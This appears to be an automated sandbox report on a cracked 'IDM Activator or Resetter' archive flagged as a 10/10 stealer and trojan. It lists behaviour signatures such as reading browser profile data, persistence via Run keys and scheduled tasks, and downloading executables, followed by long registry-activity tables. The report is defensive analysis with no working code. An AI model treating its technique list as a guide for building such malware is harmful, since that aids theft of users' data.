Malware Analysis Report

2025-01-18 21:45

Sample ID 240414-cxtcsagd6x
Target IDM 6.xx Activator or Resetter v3.3.rar
SHA256 c17b7a2eaf68b8767f6a53e394e1be6661342162831ef3067ae5316d00d78a1f
Tags
adware discovery evasion persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c17b7a2eaf68b8767f6a53e394e1be6661342162831ef3067ae5316d00d78a1f

Threat Level: Known bad

The file IDM 6.xx Activator or Resetter v3.3.rar was found to be: Known bad.

Malicious Activity Summary

adware discovery evasion persistence spyware stealer trojan

Drops file in Drivers directory

Downloads MZ/PE file

Blocklisted process makes network request

Sets file to hidden

Registers COM server for autorun

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Checks installed software on the system

Checks whether UAC is enabled

Installs/modifies Browser Helper Object

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Delays execution with timeout.exe

Kills process with taskkill

Modifies registry key

Views/modifies file attributes

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer Phishing Filter

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious behavior: LoadsDriver

Suspicious behavior: CmdExeWriteProcessMemorySpam

Uses Volume Shadow Copy service COM API

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Modifies registry class

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-14 02:27

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-14 02:27

Reported

2024-04-14 02:33

Platform

win10v2004-20240412-en

Max time kernel

285s

Max time network

286s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\IDM 6.xx Activator or Resetter v3.3.rar"

Signatures

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheVersion = "1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "1" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheLimit = "51200" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1132431369-515282257-1998160155-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
